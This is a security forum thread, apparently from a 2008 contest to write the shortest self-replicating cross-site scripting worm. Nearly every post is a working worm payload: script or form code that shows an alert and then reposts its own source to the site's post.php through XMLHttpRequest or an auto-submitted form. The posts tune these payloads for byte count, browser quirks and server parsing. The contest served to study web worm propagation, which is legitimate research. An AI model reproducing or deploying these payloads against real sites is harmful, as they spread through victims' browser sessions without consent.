@sirdarckcat: I'm not sure what you mean by missing the payload. Its on this line populated mostly by the valueOf method:

x.send("content=<script>" + p.valueOf() + "p()<\/script>");

And what do you mean by server header dependent?

dev80
read the last rule of the contest..

8) must have a payload of "XSS" in an alert box

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

OOOH!, duh, sorry about that. 159 bytes

<script>function p() {
alert("xss");
x=new XMLHttpRequest;
x.open("post","post.php");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Just not to post the obvious,

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

161!

<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>

156!


And OK, the obvious:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

Goodbye (I MUST work!) :(

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/05/2008 01:19PM by ma1.

<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>

155 yay

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

capitalized for ie:

<form><INPUT name="content"><SCRIPT>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),149))</SCRIPT>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

ah wait mine doesnt work :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>

140!! :D

http://triviasecurity.net/ ;For all your security needs

Quote
dev80

function p(){alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content="+p.valueOf()+"p()<\/script>");}p()

I guess you read my post and stripped + bloated some stuff .. I thought you had something new with the valueOf, instead of toString, but it works the same. On FF you still have the bloat problem (see post), and the \/ get's evaluated to / on FF so you're worm fails on the second runtime. Next to that you're not encoding it right ...

@bwb labs, still trying to figure out what you meant by the first part of your statement, but I think amado might have cut it down... also...

what do you mean by not encoding it right? For most web applications, that part is optional as they'll deal with incoming content whether or not its properly URL encoded.

I just tested this..

without content-type the XHR is useless, sorry

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

do you mean data won't be sent or parsed by post.php or something else?

wont be parsed by Apache

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Quote
dev80
still trying to figure out what you meant by the first part of your statement

just ''+p is equal to p.toString() or p.valueOf().

Quote
dev80
what do you mean by not encoding it right?

content=function p(){alert("xss");x=new... I guess x will be defined instead of all data to content. If the app will just handle all data (in stdin or whatever), content= wouldn't be needed either.

Quote
dev80
do you mean data won't be sent or parsed

I was only testing the sending, that is done (without header).

Quote
amado

<script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>

You've solved one of the crappy problems, great! (namely "cannot reference to f in f: f=function(){reference to f}();")
So that strips 2 bytes of my solution :-).

To summarize:
old failing: <script>w=function(){alert(w)}()</script>
amado trick: <script>(function w(){alert(w);}())</script>
old sol:<script>w=function(){send('w='+w+';w()')};w()</script>
new sol:<script>(function w(){send('('+w+'())')}())</script>
Saving two bytes!!!

I'm sticking to the fact that you still have to do it my way (encoding wise) and still have the FF bloat problems:

<script>(function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>("+f+"())</sc"+"ript>"));}())</script>

166 bytes

Crap:
- dubious function.toString() :-)
- bloat (space/tab/newline) in source!!! (and ' get's converted to ", and an extra ; is added)
- still: encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

Quote
ma1
And OK, the obvious:
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

Goodbye (I MUST work!) :(

I surrender to my master, I cant think on anyway of making this code shorter..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 03:18PM by sirdarckcat.

bwb labs, u dont need that last semicolon at the end of the function after send(..), thatll save u one byte ;)

but like sirdarckcat mention, it wont work in apache.

@ma1

That last one can three bytes shorter.

From:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

To:

<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

At least, I THINK that'll still work...works in Firefox, no IE handy to test.

*Edited to change "147" to "146" in the modified one.



Edited 1 time(s). Last edit at 01/05/2008 03:37PM by shawn.

Quote
amado
u dont need that last semicolon at the end of the function after send(..), thatll save u one byte ;)
but like sirdarckcat mention, it wont work in apache.

I know, the last semicolon is added by the FF toString, so that's why I left it there.
About the "Content-Type: application/www-form-urlencoded" problem, I've just tested on IIS6/ASP.NET, it is required there too.

Quote
rsnake
7) must work in at least Internet Explorer 7.0 and Firefox 2.x

rsnake didn't give server architecture specs, we can assume PHP as parsing language, but still it is the webserver software who does the CGI form value parsing (I think), there might be an exotic webserver who'll work without the Content-Type (or I can build it myself ;-).

@shawn: But this is against the rules. The stripped quotes will be inserted again.

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/05/2008 03:46PM by Alex.

Quote
shawn
<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

that doesnt work on replication.

Quote
bwb labs
(or I can build it myself ;-)

hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137



Edited 2 time(s). Last edit at 01/05/2008 03:50PM by Spyware.

just in case XHR without content-type is valid, they can still be reduced:

<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>

141

<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>

164

Quote
Spyware
<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

122

The 2nd version becomes:
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137

-Spyware

check the rules, it shouldnt grow.. you have to do something like..

ÿ<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/ÿ.*/);alert('xss');submit()"></form>

but I dont know if that's valid or if it'll work.. you need a linebreak at the end.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 01/05/2008 04:03PM by sirdarckcat.

To all you who slice/substr: if the content field is truncated, it doesn't matter if a </form> field will be added to the field, since the truncation will remove it then. If it will be completely rejected if it get's to long, a slice/substr will be needed of course (since it'll be shorter than duplicating a closing form tag). It all depends on rsnake to clarify some rules here again :-).

To all <form id=whatever> posters, I get Error: whatever is not defined in FF2, should the HTML page comply to some quicksmode/doctype thing?

Quote
sirdarckcat
hahaha your code will work fine on my webserver.. (I made one.. Azteca WebServer), I'll give you that.. but rsnake still has to decide that.

Cool :-), yeah, we do need a clarification for it...

bwb labs:
well, the reason I have 2 first/second places on the list is because it depends on rsnake if it's valid or not, if it's not, then the not-bold scores will apply.

and in the slice/substr:

this is longer:

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML+'</form>'))</SCRIPT></form>

than this:

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php', content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

or what do you mean?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@Sirdarckcat

The growth was caused by Firefox adding stuff to make it a little bit compliant. If it cannot grow, I'll submit the second version.

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

137, doesn't grow ;)

@Spyware it still grows:
<body>
blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

will submit:

blahblahblah
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

maybe something like this:

<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 04:07PM by sirdarckcat.

Oh man, I need some sleep. Of course it grows, thanks for pointing that out, again. Let me work on it some more.

Alex Wrote:
-------------------------------------------------------
> @shawn: But this is against the rules. The
> stripped quotes will be inserted again.

Gah...never mind that one, then. Managed to make it longer without realizing it.

Quote
sirdarckcat

<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>

You're right! That saves another 2 bytes, but the FF bloat problem stays, so this is still the shortest XMLHttpRequest worm (without Content-Type) till now:

<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

Another note about webserver software and Content-Type, there are some big sites that are running their own webserver software/proxies/strange loadbalancers, so I think the likelihood that the Content-Type is not required there is higher.